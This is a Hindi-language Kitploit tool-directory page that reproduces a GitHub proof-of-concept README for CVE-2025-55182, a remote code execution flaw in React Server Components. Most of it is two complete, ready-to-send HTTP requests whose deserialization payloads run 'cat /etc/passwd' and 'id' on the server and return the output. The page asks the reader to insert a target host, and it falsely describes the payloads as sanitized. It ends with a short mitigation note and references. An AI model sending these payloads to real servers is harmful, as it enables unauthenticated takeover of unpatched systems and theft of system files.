Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell_Rce-cve-2025-55182 — React Server Components संस्करण 19.0.0, 19.1.0, 19.1.1, और 19.2.0, जिनमें react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack शामिल हैं, में एक दूरस्थ कोड निष्पादन भेद्यता (remote code execution vulnerability) मौजूद है। | Kitploit
उपकरण/GitHubGitHub/muhammadwaseem29/react2shell_rce-cve-2025-55182
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubmuhammadwaseem29/react2shell_rce-cve-2025-55182

React2Shell_Rce-cve-2025-55182

React Server Components संस्करण 19.0.0, 19.1.0, 19.1.1, और 19.2.0, जिनमें react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack शामिल हैं, में एक दूरस्थ कोड निष्पादन भेद्यता (remote code execution vulnerability) मौजूद है।

रिपॉजिटरी देखेंवेबसाइट
3239 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React Server Components RCE – README

शुभ दिन, मुझे सच में उम्मीद है कि स्क्रीन के उस पार आपके लिए सब कुछ शानदार हो! 😊✨

विवरण

React Server Components के संस्करण 19.0.0, 19.1.0, 19.1.1, और 19.2.0, जिनमें react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack शामिल हैं, में एक रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है।

यह समस्या Server Function एंडपॉइंट्स पर भेजे गए हमलावर-नियंत्रित पेलोड्स के असुरक्षित डिसीरियलाइज़ेशन के कारण उत्पन्न होती है।


PoC – पूर्ण अनुरोध (सैनिटाइज़्ड)

नीचे भेद्यता को प्रदर्शित करने वाला पूरा HTTP अनुरोध है, जिसमें संवेदनशील कमांड्स को प्लेसहोल्डर्स से बदल दिया गया है। redacted.com को अपने लक्ष्य होस्ट से बदलें।

root@kitploit:~
POST / HTTP/1.1
Host: redacted.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Screenshot 2025-12-06 at 11 49 57 PM

id कमांड

root@kitploit:~
POST / HTTP/1.1
Host: redecated.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Screenshot 2025-12-06 at 11 55 21 PM

PoC सारांश:

  • सर्वर मल्टीपार्ट अनुरोध से संरचित पेलोड्स को डिसीरियलाइज़ करता है।
  • असुरक्षित डिसीरियलाइज़ेशन हमलावर को निष्पादन प्रवाह को प्रभावित करने की अनुमति देता है।
  • सुरक्षा के लिए संवेदनशील कमांड्स को प्लेसहोल्डर्स से बदल दिया गया है।

प्रभाव

बिना प्रमाणीकरण वाले हमलावर दूरस्थ रूप से मनमाना कोड निष्पादित कर सकते हैं, जो संभावित रूप से पूर्ण सिस्टम समझौते का कारण बन सकता है।


निवारण

React Server Components के नवीनतम रिलीज़ में अपडेट करें, जहाँ असुरक्षित डिसीरियलाइज़ेशन पथ पैच किए गए हैं।


संदर्भ

  • https://github.com/assetnote/react2shell-scanner
  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
  • https://www.facebook.com/security/advisories/cve-2025-55182
  • http://www.openwall.com/lists/oss-security/2025/12/03/4
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp
  • https://vercel.com/changelog/cve-2025-55182

स्क्रीन के उस पार आप खुशहाल रहें :) ✨❤️


टूल डाउनलोड करें